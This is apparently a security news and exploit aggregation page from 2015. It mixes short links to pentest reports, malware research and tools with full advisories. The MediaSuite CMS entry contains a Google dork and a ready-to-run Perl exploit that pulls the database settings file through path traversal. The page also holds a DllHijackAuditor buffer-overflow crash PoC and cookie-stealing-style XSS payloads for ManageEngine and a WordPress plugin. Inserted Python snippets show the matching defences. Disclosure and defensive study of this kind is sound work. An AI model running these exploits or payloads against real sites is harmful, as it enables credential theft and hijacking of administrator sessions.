Channel: BOT24

Passive DNS network mapping

Dnsmap – Passive DNS network mapper a.k.a. subdomains bruteforcer.

dnsmap is mainly meant to be used by pentesters during the information gathering/enumeration phase of infrastructure security assessments. During the enumeration stage, the security consultant would typically discover the target company’s IP netblocks, domain names, phone numbers, etc …

Subdomain brute-forcing is another technique that should be used in the enumeration stage, as it’s especially useful when other domain enumeration techniques such as zone transfers don’t work.

more here.......http://securityblog.gr/2523/passive-dns-network-mapping/

MediaSuite CMS - Arbitrary File Disclosure Exploit

 |  |__    /  |  |___  __\   _  \_______   ____
                |  |  \  /   |  |\  \/  /  /_\  \_  __ \_/ __ \
                |      \/    ^   />    <\  \_/   \  | \/\  ___/
                |___|  /\____   |/__/\_ \\_____  /__|    \___  >
                     \/      |__|      \/      \/            \/
                         _____________________________
                        /   _____/\_   _____/\_   ___ \
                        \_____  \  |    __)_ /    \  \/    http://twitter.com/h4SEC
                        /        \ |        \\     \____   Proof Video: https://www.youtube.com/watch?v=7yxbfD1YK8Y
                       /_______  //_______  / \______  /
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] E-Mail : knockout@e-mail.com.tr
[~] Twitter: http://twitter.com/h4SEC
[~] HomePage : http://h4x0resec.blogspot.com - http://cyber-warrior.org - http://www.fiXen.org
[~] Greetz: ZoRLu, DaiMon, VolqaN, DaiMon, KedAns-Dz , Septemb0x, BARCOD3, b3mb4m, SysToxic, EthicalHacker and all TurkSec Group members.
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : MediaSuite CMS - Arbitrary File Disclosure Exploit
|~Price : N/A
|~Version : All CMS
|~Software: http://www.mediasuite.ca
|~Vulnerability Style :  File Disclosure
|~Vulnerability Dir : /
|~Google Dork : "MediaSuite.ca - Website Design, Media Marketing Suite - Barrie Ontario"
|[~]Date : "20.04.2015"
|[~]Exploit Tested on :  >>>> www.mediasuite.ca ( Official Web ) <<<<<
----------------------------------------------------------
---------------------Info;--------------------------------
----------------------------------------------------------
The database credentials can be read easily: fetching "site-settings.php" through the download script is sufficient,
and that file holds the local database configuration.
The cause is careless, unchecked input handling in the "force-download.php" file.
The responsible code is, frankly, laughable :)

##################################################################################################
      file in "force-download.php"
..
..
..
$type = $_GET['type'];
$file = $_GET['file'];

if($type == "1"){
$filename = "../uploads/$file";
}
..
..
..
}
header("Pragma: public"); // required
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Cache-Control: private",false); // required for certain browsers
header("Content-Type: $ctype");
// change, added quotes to allow spaces in filenames, by Rajkumar Singh
header("Content-Disposition: attachment; filename=\"".basename($filename)."\";" );
header("Content-Transfer-Encoding: binary");
header("Content-Length: ".filesize($filename));
readfile("$filename");
exit();
..
...
#####################################################################################################
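The excerpt above concatenates the request value straight into "../uploads/$file" and hands it to readfile(), so "../" segments walk out of the uploads directory. The following is an added example (not MediaSuite's code) that mirrors that pattern next to a hardened resolver a fixed handler would use; the directory layout, file names and the assumption that uploads are flat files are constructed for the example.

```python
"""Added example: naive vs hardened resolution of a user-supplied download name.
The on-disk layout is constructed in a temporary directory so it runs offline."""
import os
import tempfile
from typing import Optional
from urllib.parse import unquote


def naive_resolve(uploads_dir: str, requested: str) -> str:
    """Mirrors the vulnerable PHP ($filename = "../uploads/$file"; readfile()):
    the request value is concatenated verbatim, so "../" escapes uploads/."""
    return os.path.normpath(os.path.join(uploads_dir, requested))


def safe_resolve(uploads_dir: str, requested: str) -> Optional[str]:
    """Hardened resolution:
    1. decode before checking, and open the decoded name, so the value that is
       checked is the value that is opened (no %2e%2e%2f smuggling);
    2. refuse absolute paths, NUL bytes, backslashes and any "/" at all
       (assumption for this example: downloads are flat files in uploads/);
    3. canonicalise with realpath() and require the result to stay inside the
       canonical uploads directory, which also defeats symlink escapes;
    4. require an existing regular file.
    Returns the canonical path, or None when the request is rejected."""
    name = unquote(requested)
    if not name or os.path.isabs(name) or "\x00" in name:
        return None
    if "\\" in name or "/" in name or name in (".", ".."):
        return None
    base = os.path.realpath(uploads_dir)
    target = os.path.realpath(os.path.join(base, name))
    # commonpath(), not startswith(): "/srv/uploads2" must not pass for "/srv/uploads"
    if os.path.commonpath([base, target]) != base:
        return None
    if not os.path.isfile(target):
        return None
    return target


def build_demo_tree() -> str:
    """Constructed layout: <root>/uploads/report.pdf and
    <root>/includes/site-settings.php, the relative layout the advisory's
    force-download.php assumes (it lives in includes/)."""
    root = tempfile.mkdtemp(prefix="mediasuite-demo-")
    os.makedirs(os.path.join(root, "uploads"))
    os.makedirs(os.path.join(root, "includes"))
    with open(os.path.join(root, "uploads", "report.pdf"), "w") as fh:
        fh.write("%PDF-1.4 constructed sample\n")
    with open(os.path.join(root, "includes", "site-settings.php"), "w") as fh:
        fh.write("<?php $db_pass = 'constructed-placeholder'; ?>\n")
    return root


def demo() -> dict:
    """Runs the advisory's file= value through both resolvers and reports
    whether each would hand out the settings file."""
    root = build_demo_tree()
    uploads = os.path.join(root, "uploads")
    payload = "../includes/site-settings.php"  # the advisory's file= value
    naive = naive_resolve(uploads, payload)
    return {
        "naive_leaks_settings": os.path.isfile(naive) and naive.endswith("site-settings.php"),
        "safe_rejects_payload": safe_resolve(uploads, payload) is None,
        "safe_rejects_encoded": safe_resolve(uploads, "..%2Fincludes%2Fsite-settings.php") is None,
        "safe_serves_upload": safe_resolve(uploads, "report.pdf") is not None,
        "safe_rejects_missing": safe_resolve(uploads, "nope.pdf") is None,
    }


if __name__ == "__main__":
    for check, result in demo().items():
        print(f"{check}: {result}")
```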
------------------Demos---------------------------------------
--------------------------------------------------------------


##################################################################################################
##############################Exploit.pl#########################################################
##################################################################################################

use LWP::Simple;
use LWP::UserAgent;
system('cls');
system('title MediaSuite CMS - Artibary File Disclosure Exploit');
system('color 2');
if(@ARGV < 2)
{
print "[-]Su Sekilde Kocum. \n\n";
&help; exit();
}
sub help()
{
print "[+] Usaqe : perl $0 Target /path/ \n";
print "[+] Usage  : perl $0 localhost / \n";
}
print "\n************************************************************************\n";
print "\* MediaSuite CMS - Artibary File Disclosure Exploit             *\n";
print "\* Exploit coded by : KnocKout                                                  *\n";
print "\* Contact : twitter.com/h4SEC                                 *\n";
print "\* --                                    *\n";
print "\*********************************************************************\n\n\n";
($TargetIP, $path, $File,) = @ARGV;
$File="includes/force-download.php?type=1&file=../includes/site-settings.php";
my $url = "http://" . $TargetIP . $path . $File;
print "\n Biraz Bekle. \n\n";
my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "site-settings.php");
if ($request->is_success)
{
print "[+] Exploit Basarili, kodlayanin eline saglik \n\n";
print "[+] Exploit Basarili. !\n";
print "[+] Database bilgilerinin yer aldigi (site-settings.php) dosyasi indirildi. \n";
print "[+] h4 SEC \n";
print "[+] Special tnX : ZoRLu, _UnDeRTaKeR, DaiMon, VoLqaN, BARCOD3, Septemb0x, EthicalHacker \n";
exit();
}
else
{
print "[!] Exploit $url Basarisiz !\n[!] ".$request->status_line."\n";
exit();
}

# milw00rm.com [2015-04-21] http://www.milw00rm.com/exploits/8079

DllHijackAuditor 3.5 - Denial Of Service / Crash PoC

# Title : DllHijackAuditor 3.5 - Denial Of Service / Crash PoC
# Author : ZwX
# Date : 21/04/2015
# Download Software : http://securityxploded.com/dllhijackauditor.php
# Vendor : http://securityxploded.com/
# Tested on : Windows 7

------------------------
Reproduce
------------------------

1. Run DllHijackAuditor
2. Load an .EXE program
3. Run the Perl code and copy the contents of the file PoC.txt
4. Paste the characters into the "Specify Extension" input and click Start Audit
5. DllHijackAuditor crashes

------------------------
PoC
------------------------

#!/usr/bin/perl
use strict;
use warnings;

# Build a 500-byte string of "A" and write it to PoC.txt; its contents are
# pasted into the "Specify Extension" field as described in the steps above.
my $junk1 = "A" x 500;
open(my $fh, '>', 'PoC.txt') or die "Cannot write PoC.txt: $!";
print $fh $junk1;
close($fh);

print "Done\n";

------------------------
Crash Log
------------------------

EventType=BEX <== Buffer Overflow
EventTime=130738615746972233
ReportType=2
Consent=1
UploadTime=130738615752432243
ReportIdentifier=4b47b73e-e607-11e4-b32e-a28695713d6b
IntegratorReportIdentifier=4b47b73d-e607-11e4-b32e-a28695713d6b
Response.BucketId=203778435
Response.BucketTable=19
Response.type=4
Sig[0].Name=Nom de l’application
Sig[0].Value=DllHijackAuditor.exe
Sig[1].Name=Version de l’application
Sig[1].Value=3.5.0.0
Sig[2].Name=Horodatage de l’application
Sig[2].Value=534bb17f
Sig[3].Name=Nom du module par défaut
Sig[3].Value=DllHijackAuditor.exe
Sig[4].Name=Version du module par défaut
Sig[4].Value=3.5.0.0
Sig[5].Name=Horodateur du module par défaut
Sig[5].Value=534bb17f
Sig[6].Name=Décalage de l’exception
Sig[6].Value=00129e6d
Sig[7].Name=Code de l’exception
Sig[7].Value=c0000417
Sig[8].Name=Données d’exception
Sig[8].Value=00000000
State[0].Key=Transport.DoneStage1
State[0].Value=1
State[1].Key=DataRequest
State[1].Value=Bucket=203778435/nBucketTable=19/nResponse=1/n
FriendlyEventName=Fonctionnement arrêté
ConsentKey=BEX <== Buffer Overflow
AppName=Smart Tool to Audit the Dll Hijack Vulnerability
AppPath=C:\Users\ZwX\Desktop\Dll Hijacking\DllHijackAuditor\DllHijackAuditor.exe

# milw00rm.com [2015-04-21] http://www.milw00rm.com/exploits/8080

NASA'S DATA PORTAL

New Pentest-Report Bazaar / FDroid 01.2015

“Bazaar lets you download apps securely, and share the apps on your phone with
people in close proximity using whatever means are available (WiFi, Bluetooth, NFC,
SDCard, etc). It also audits your installed apps by comparing them to the versions that
other people have installed to make sure they are not malware. We are building upon
the FDroid free software app store for Android to improve the security of the process
while enabling decentralized and peer-to-peer distribution.”
From https://dev.guardianproject.info/projects/bazaar/wiki

This test against several components of the FDroid application and service compound
lasted twelve days and involved efforts from four testers from the Cure53 Team. The test
yielded seventeen security issues and weaknesses total. Among them, two were
classified as ‘Critical’ in regard to their severity. The scope of this project was particularly
broad, since the assignment covered a server-side implementation (composed in
Python), an Android app, and a Wordpress Plugin (written in PHP). In addition, a
majority of services offered on the FDroid website were also examined.

more here........https://cure53.de/pentest-report_fdroid.pdf

Vortessence

Vortessence is a tool, whose aim is to partially automate memory forensics analysis. Vortessence is a project of the Security Engineering Lab of the Bern University of Applied Sciences.

more here..........https://github.com/vortessence/vortessence

CVE-2015-1097: Deobfuscating iOS Kernel Pointers With an IBM X-Force-Discovered Vulnerability

In January, Barak Gabai of the X-Force Application Security Research Team discovered an interesting information leak vulnerability in iOS IOKit IOMobileFramebuffer (CVE-2015-1097), which can be used to defeat the kernel address obfuscation mechanism available since iOS 6. The vulnerability was disclosed to Apple and has been fixed in iOS 8.3.

In this blog post, I will provide a brief overview of the kernel address obfuscation technique employed by iOS and show how Gabai’s vulnerability renders it ineffective, as is the case with similar memory disclosures. I will also briefly touch on what I believe makes this particular vulnerability uniquely interesting.

more here.........http://securityintelligence.com/cve-2015-1097-deobfuscating-ios-kernel-pointers-with-an-ibm-x-force-discovered-vulnerability/#.VTZVXiFViko

Google Analytics by Yoast stored XSS #2 (Inclusive video demo)

Google Analytics by Yoast is a WordPress plug-in for monitoring website traffic. With approximately seven million downloads it’s one of the most popular WordPress plug-ins.

Klikki has identified a second critical security vulnerability in the plug-in. The severity and impact is similar to the first vulnerability. An unauthenticated attacker can store arbitrary HTML, including JavaScript, in the WordPress administrator’s Dashboard on the target system. The JavaScript will be triggered when an administrator views the Analytics panel. No other user interaction is required.

The attacker can perform administrative actions on the target system. By default, this would lead to arbitrary server-side code execution via the plugin or theme editors (see the YouTube example).

Alternatively the attacker could change the administrator’s password, create new administrator accounts, or do whatever else the currently logged-in administrator can do on the target system.

The bug was found and reported to the vendor on March 22. An update (version 5.4) correcting the issue was released on April 20.

Details here......http://klikki.fi/adv/yoast_analytics2.html

PoC: MS15-034 Exploited From Excel

Constructing the PoC of CVE-2015-3043

SSH & Meterpreter Pivoting Techniques

WTF is Pivoting?

Pivoting is a technique used to route traffic through a compromised host on a penetration test.

When conducting an external penetration test you may need to route traffic through a compromised machine in order to compromise internal targets.

Pivoting allows you to leverage tools on your attacking machine while routing traffic through other hosts on the subnet, potentially allowing access to other subnets.

more here.........https://highon.coffee/blog/ssh-meterpreter-pivoting-techniques/

Reverse engineering Mischief file format Part 1, 2 and 3

Here is a great drawing program called Mischief...https://www.madewithmischief.com/

It is beautiful, minimalistic, vector-based and very responsive. What's there not to like?

I wanted to read their file format, but it turned out to be harder than expected.
So I decided to write about the reverse-engineering process.

Part 1 here.......http://m1el.github.io/mischief/part-1.html



In part 2, we're going to look at the unpacking function in Mischief here....http://m1el.github.io/mischief/part-2.html


and in part 3 we're going to parse unpacked .art data here.....http://m1el.github.io/mischief/part-3.html

HOW TO CRACK MIFARE CLASSIC CARDS

Texas aims to limit controversial "stingray" phone-tracking tech

Reflected XSS Vulnerability In Manage Engine Firewall Analyzer

========================================================================
Reflected XSS Vulnerability In Manage Engine Firewall Analyzer
========================================================================

.. contents:: Table Of Content

Overview
========

* Title: Reflected XSS Vulnerability in Manage Engine Firewall Analyzer
* Author: Kapil Kulkarni
* Plugin Homepage: https://www.manageengine.com/products/firewall/?gclid=CKH3rLyNiMUCFUQnjgodwHIA1A&gclsrc=aw.ds
* Severity: Low
* Version Affected: Version 8.3 Build Number: 8300
* Version Patched: separate patch release for all versions

Description
===========

About the Product
=================
ManageEngine Firewall Analyzer is agentless log analytics and configuration management software that helps network
administrators centrally collect, archive and analyze their security device logs and generate forensic reports from
them. The real-time event response system and integrated Compliance Management module of Firewall Analyzer automate
endpoint security monitoring, network bandwidth monitoring and security and compliance auditing. Firewall Analyzer
eases device configuration management by providing out-of-the-box reports and alerts for configuration changes.
Firewall Analyzer is vendor-agnostic and supports almost all open source and commercial network firewalls, such as
Check Point, Cisco, Juniper, Fortinet, Snort, Squid Project, SonicWALL and Palo Alto, as well as IDS/IPS, VPNs,
proxies and other related security devices.


Vulnerable Parameter
--------------------

* j_username

About Vulnerability
-------------------
This product is vulnerable to a reflected XSS attack: if an admin user can be tricked into visiting a crafted URL
created by the attacker (via spear phishing or social engineering), the attacker can execute arbitrary script in the
login page. Once exploited, the admin's browser can be made to do almost anything the admin user could typically do,
for example by hijacking the admin's cookies.

Vulnerability Class
===================
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))

Steps to Reproduce: (POC)
=========================
1. After setting up ManageEngine, navigate to its user interface.

2. Use this payload in the Username field:

#####payload To Use#######################
"><script>alert(document.cookie)</script>
##########################################

3. Observe the XSS in action.

# Live PoC URL
http://2.bp.blogspot.com/-tR6Sj42AU3U/VTah88edXnI/AAAAAAAABMo/N8DjRQorso4/s1600/poc_xss.JPG
http://kapil-hackertutorials.blogspot.in/

Mitigation
==========
Follow the steps below to apply the vendor's fix for the XSS vulnerabilities:

1. Stop the FWA service.

2. Download the fix and extract it:

This would contain 7 fix folders and 1 additional folder:

• FWA Home - conf (1 file)
• FWA Home - lib (8 files)
• FWA Home - lib - resources (2 files)
• FWA Home - webapps - fw - images (1 file)
• FWA Home - webapps - fw - javascript (2 files)
• FWA Home - webapps - fw - styles (1 file)
• FWA Home - webapps - fw - WEB-INF (2 files)
and

• Screen-shot folder
// The last, additional folder contains screenshots for your reference, explaining which files have to be placed or
replaced, and where. //

3. Now place or replace the files as per the screen-shots from the above 7 folders to their respective locations as
instructed below:


For each location, "Files to be replaced" already exist under that name in the location; just replace them.

Location: C:\ManageEngine\Firewall\conf
  Files to be newly placed: antisamy-fwa-policy.xml
  Files to be replaced: -

Location: C:\ManageEngine\Firewall\lib
  Files to be newly placed: antisamy-1.5.3, batik-css.jar, nekohtml.jar, ss_css2.jar, xercesImpl.jar, xml-apis.jar
  Files to be replaced: FirewallAnalyzerJSP.jar, LogAnalyzerClient.jar

Location: C:\ManageEngine\Firewall\lib\resources
  Files to be newly placed: -
  Files to be replaced: MessageResources.prop, MessageResources_JS_en_US.prop

Location: C:\ManageEngine\Firewall\webapps\fw\images
  Files to be newly placed: errorpage.png
  Files to be replaced: -

Location: C:\ManageEngine\Firewall\webapps\fw\javascript
  Files to be newly placed: -
  Files to be replaced: FAUtil.js, PolicyReport.js

Location: C:\ManageEngine\Firewall\webapps\fw\styles
  Files to be newly placed: -
  Files to be replaced: newTheme.css

Location: C:\ManageEngine\Firewall\webapps\fw\WEB-INF
  Files to be newly placed: -
  Files to be replaced: struts-config.xml, web.xml

// C:\ManageEngine\Firewall is referred to as <FWA Home>, i.e. the default FWA installation folder //

4. Start the FWA service.

This should fix the vulnerability issues.
Change Log
==========

Disclosure
==========
23-March-2015 Reported to Developer
28-February-2015 Acknowledgement from Developer
04-April-2015 Fixed by developer
05-April-2015 Requested a CVE ID
22-April-2015 Public Disclosed
Credits
=======
* Kapil Kulkarni
* Information Security Testing
* ControlCase International Pvt Ltd.
* https://www.facebook.com/kapil.kulkarni.587
* https://in.linkedin.com/pub/kapil-kulkarni-c-eh/63/337/5a3

Reflected XSS Vulnerability In Manage Engine Event Log Analyzer

========================================================================
Reflected XSS Vulnerability In Manage Engine Event Log Analyzer
========================================================================

.. contents:: Table Of Content

Overview
========

* Title: Reflected XSS Vulnerability in Manage Engine Event Log Analyzer
* Author: Kapil Kulkarni
* Plugin Homepage: https://www.manageengine.com/products/eventlog/
* Severity: Low
* Version Affected: Version 10 Build Number: 10003
* Version Patched: separate patch release for all versions

Description
===========

About the Product
=================
EventLog Analyzer provides the most cost-effective Security Information and Event Management (SIEM) software on the
market. Using this log analyzer software, organizations can automate the entire process of managing terabytes of
machine-generated logs by collecting, analyzing, correlating, searching, reporting and archiving from one central
location. This event log analyzer software helps to monitor file integrity, conduct log forensics analysis, monitor
privileged users and comply with different regulatory bodies by intelligently analyzing your logs and instantly
generating a variety of reports, such as user activity reports, historical trend reports and more.

Vulnerable Parameter
--------------------

* j_username

About Vulnerability
-------------------
This product is vulnerable to a reflected XSS attack: if an admin user can be tricked into visiting a crafted URL
created by the attacker (via spear phishing or social engineering), the attacker can execute arbitrary script in the
login page. Once exploited, the admin's browser can be made to do almost anything the admin user could typically do,
for example by hijacking the admin's cookies.

Vulnerability Class
===================
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))

Steps to Reproduce: (POC)
=========================
1. After setting up ManageEngine, navigate to its user interface.

2. Use this payload in the Username field:

#####payload To Use#######################
"><script>alert(document.cookie)</script>
##########################################

3. Observe the XSS in action.

# Live PoC URL
http://1.bp.blogspot.com/-ujCdc0Ryknc/VTadwPT9bZI/AAAAAAAABMc/MuSU3XKtKsY/s1600/xss_reponse.JPG

Mitigation
==========
Follow the steps below to fix the issue:
1. Stop the ELA service.
2. Download the file from the following link and extract it into C:\ManageEngine\EventLog\lib\, where
C:\ManageEngine\EventLog is the folder you installed it in.
http://bonitas2.zohocorp.com/zipUploads/2015_01_04_03_07_14_o_19hos70vafslcd31ts716gm1gvq1.tar.gz
3. Once extracted, the folder structure has to be as below.
C:\ManageEngine\EventLog\lib\EventLogAnalyzerJSP\com\adventnet\sa....
4. Start the EventLog Analyzer service.
This should fix the issue.
P.S.: Extract the archive and put the folder inside the location. Do not copy the entire archive file to the location,
as it will not work.

Change Log
==========

Disclosure
==========
23-March-2015 Reported to Developer
28-February-2015 Acknowledgement from Developer
04-April-2015 Fixed by developer
06-April-2015 Requested a CVE ID
22-April-2015 Public Disclosed
Credits
=======
* Kapil Kulkarni
* Information Security Testing
* ControlCase International Pvt Ltd.
* https://www.facebook.com/kapil.kulkarni.587
* https://in.linkedin.com/pub/kapil-kulkarni-c-eh/63/337/5a3

The CozyDuke APT

CozyDuke (aka CozyBear, CozyCar or "Office Monkeys") is a threat actor that became increasingly active in the 2nd half of 2014 and hit a variety of targets. The White House and Department of State are two of the most spectacular known victims.

The operation presents several interesting aspects:

* blatantly sensitive high profile victims and targets
* crypto and anti-detection capabilities
* strong malware functional and structural similarities mating this toolset to early MiniDuke second stage components, along with more recent CosmicDuke and OnionDuke components

more here..........https://securelist.com/blog/69731/the-cozyduke-apt/

Threatbutt

I thought I heard it all. What a name! A new site known as http://threatbutt.com/ at RSA announced its comprehensive private, hybrid, public and cumulus cloud system hacking protector, which is in private beta.

Stored Cross Site Scripting Vulnerability in Add Link to Facebook WordPress Plugin

Title: Stored XSS Vulnerability in Add Link to Facebook Wordpress Plugin

Author: Rohit Kumar

Plugin Homepage: http://wordpress.org/extend/plugins/add-link-to-facebook/

Severity: Medium

Version Affected: Version 1.215 and mostly prior to it.

Version Tested: Version 1.215

Version Patched : 1.215

Description:

Vulnerable Parameter
1. App ID
2. App Secret
3. Custom Picture URL
4. Default Picture URL
5. URL News Feed Icon

About Vulnerability
This plugin is vulnerable to a stored cross-site scripting vulnerability. The issue is triggered when a user
accesses the "Add Link to Facebook" settings in WordPress with Administrator privileges. A malicious
administrator can hijack other users' sessions, take control of another administrator's browser or install
malware on their computer.

Vulnerability Class:
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))

Steps to Reproduce:
After installing the plugin:
* Go to Settings -> All in One Facebook
* Input this payload in "App ID": "><script>alert(1)</script>
* Click on the Save button.
* After reloading the page you will see a pop-up box with 1 written on it.
* Reload the page again to make sure it's stored.
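The payloads in this advisory and in the two ManageEngine advisories above all work the same way: a leading `">` closes the attribute the value is echoed into, and the rest of the input becomes markup. The following is an added example (not the vendors' or the plugin's code) showing that breakout against a constructed stand-in for the j_username login field and the App ID / picture URL settings fields, beside the two controls that stop it: attribute encoding on output, and allowlist validation on input for fields with a known shape (the digits-only App ID rule and the http/https scheme list are assumptions made for the example).

```python
"""Added example: attribute-context XSS breakout and its mitigations.
The form markup is a constructed stand-in, not the products' real pages."""
import html
import re
from typing import Optional
from urllib.parse import urlsplit

PAYLOAD = '"><script>alert(document.cookie)</script>'  # from the ManageEngine advisories
# Assumption for this example: picture URLs may only use these schemes.
SAFE_URL_SCHEMES = {"http", "https"}


def render_login_unsafe(j_username: str) -> str:
    """Vulnerable pattern: the submitted username is echoed verbatim into the
    value attribute, so '">' ends the attribute and the tag."""
    return f'<input type="text" name="j_username" value="{j_username}">'


def escape_attr(value: str) -> str:
    """HTML attribute encoding. quote=True also encodes " and ', so no value
    can close the attribute it sits in or open a new tag."""
    return html.escape(value, quote=True)


def render_login_safe(j_username: str) -> str:
    """Fixed pattern: the same template, but every dynamic value is encoded."""
    return f'<input type="text" name="j_username" value="{escape_attr(j_username)}">'


def validate_app_id(app_id: str) -> Optional[str]:
    """Stored settings with a known shape get an allowlist check before they
    are saved; App ID is treated as 1-32 digits (assumption for this example)."""
    return app_id if re.fullmatch(r"[0-9]{1,32}", app_id) else None


def validate_picture_url(url: str) -> Optional[str]:
    """URL fields need more than encoding: an encoded javascript: URL still
    executes once it lands in src/href, so the scheme is allowlisted too."""
    cleaned = url.strip()
    parts = urlsplit(cleaned)
    if parts.scheme.lower() not in SAFE_URL_SCHEMES or not parts.netloc:
        return None
    return cleaned


def render_settings_safe(app_id: str, picture_url: str) -> str:
    """Validate on save, encode on output; rejected values fall back to empty
    so nothing attacker-controlled reaches the settings page."""
    safe_id = validate_app_id(app_id) or ""
    safe_url = validate_picture_url(picture_url) or ""
    return (f'<input name="app_id" value="{escape_attr(safe_id)}">'
            f'<img src="{escape_attr(safe_url)}">')


def attribute_breakout(markup: str) -> bool:
    """Check used by the examples: True if a script tag or a javascript: URL
    survived into the rendered markup, i.e. the value escaped its attribute."""
    return re.search(r"<script|javascript:", markup, re.IGNORECASE) is not None


if __name__ == "__main__":
    print("unsafe login breakout:", attribute_breakout(render_login_unsafe(PAYLOAD)))
    print("safe login breakout:  ", attribute_breakout(render_login_safe(PAYLOAD)))
    print(render_settings_safe(PAYLOAD, "javascript:alert(1)"))
```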

Change Log
https://wordpress.org/plugins/add-link-to-facebook/changelog/

Disclosure
09th March 2015

Patrol
